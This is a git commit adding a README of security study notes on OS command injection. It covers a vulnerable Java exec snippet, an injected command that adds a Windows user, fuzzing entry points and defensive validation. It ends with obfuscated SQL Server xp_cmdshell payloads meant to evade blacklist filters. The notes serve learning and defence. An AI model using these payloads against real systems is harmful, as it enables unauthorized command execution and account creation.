web security

2025-05-02 06:46:07 -04:00 · 2014-11-20 09:58:54 -05:00 · 2014-11-20 09:58:54 -05:00 · f3a1895380
commit f3a1895380
parent b54f50fbe4
3 changed files with 293 additions and 30 deletions
--- a/Web_Security/OS_Command_Injection/README.md
+++ b/Web_Security/OS_Command_Injection/README.md
@ -0,0 +1,105 @@
+# OS Command Injection
+
+
+* Methodology:
+	- Identify data entry points
+	- Inject data (payloads)
+	- Detect anomalies from the response.
+	- Automate
+
+
+
+* For example for snippet:
+```
+String cmd = new String("cmd.exe /K processReports.bat clientId=" + input.getValue("ClientId"));
+Process proc = Runtime.getRuntime().exec(cmd);
+```
+For a client id equal **444**, we would have the following string:
+```
+cmd.exe /K processReports.bat clientId=444
+```
+
+However, an attacker could run use the client id equal **444 && net user hacked hackerd/add**. In this case, we have the following string:
+
+```
+cmd.exe /K processReports.bat clientId=444 && net user hacked hacked /add
+```
+
+## Examples of Injectuon Payloads:
+
+* Control characters and common attack strings:
+	- '-- SQL injection
+	- && | OS Command Injection
+	- <> XSS
+
+* Long strings (AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA)
+
+* Binary or Null data
+
+
+## Fuzz Testing Web Applications
+
+* Focus on the relevant attack sruface of the web application.
+* Typically HTTP request parameters:
+	- QueryString
+	- POST data
+	- Cookies
+	- Other HTTP headers (User-Agent, Referer)
+
+* Other entry points with request structures:
+	- XML web services
+	- WCF, GWT, AMF
+	- Remote Method Invoation (RMI)
+
+* Fixing injection flaws:
+	- Comphehensive, consistent server-side input validation
+	- User Safe command APIs
+	- Avoid concatenating strings passed to an interpreter
+	- Use strong data types in favor of strings
+
+### Whitelist input validation
+- Input validated against known GOOD values.
+
+- Exact match:
+		* A specific list of exact values is defined
+		* Difficult when large set of values is expected
+- Pattern matching:
+		* Values are matched against known good input patterns.
+		* Data type, regular expressions, etc.
+
+### Blacklist input validation
+
+- Input validated against known BAD values.
+- Not as effective as whitelist validation.
+		* Susceptible to bypass via encoding
+		* Global protection and therefore often not aware of context.
+- Constantly changing given dynamic of application attacks.
+
+#### Evading Blacklist filters
+
+Exploit payloads: 
+
+```
+';exec xp_cmdshell 'dir';--
+```
+
+```
+‘;Declare @cmd as varchar(3000);Set @cmd =
+ ‘x’+'p’+'_’+'c’+'m’+'d’+’s’+'h’+'e’+'l’+'l’+'/**/’+””+’d’+’i'+’r’+””;exec(@cmd);--
+```
+```
+‘;ex/**/ec xp_cmds/**/hell ‘dir’;--
+```
+
+```
+Declare @cmd as varchar(3000);Set @cmd
+=(CHAR(101)+CHAR(120)+CHAR(101)+CHAR(99)+CHAR(32)+CHAR(109)+CHAR(97)+CHAR(115)+CHA
+R(116)+CHAR(101)+CHAR(114)+CHAR(46)+CHAR(46)+CHAR(120)+CHAR(112)+CHAR(95)+CHAR(99)+
+CHAR(109)+CHAR(100)+CHAR(115)+CHAR(104)+CHAR(101)+CHAR(108)+CHAR(108)+CHAR(32)+CH
+AR(39)+CHAR(100)+CHAR(105)+CHAR(114)+CHAR(39)+CHAR(59));EXEC(@cmd);--
+```
+
+```
+‘;Declare @cmd as varchar(3000);Set @cmd =
+ convert(varchar(0),0×78705F636D647368656C6C202764697227);exec(@cmd);--
+```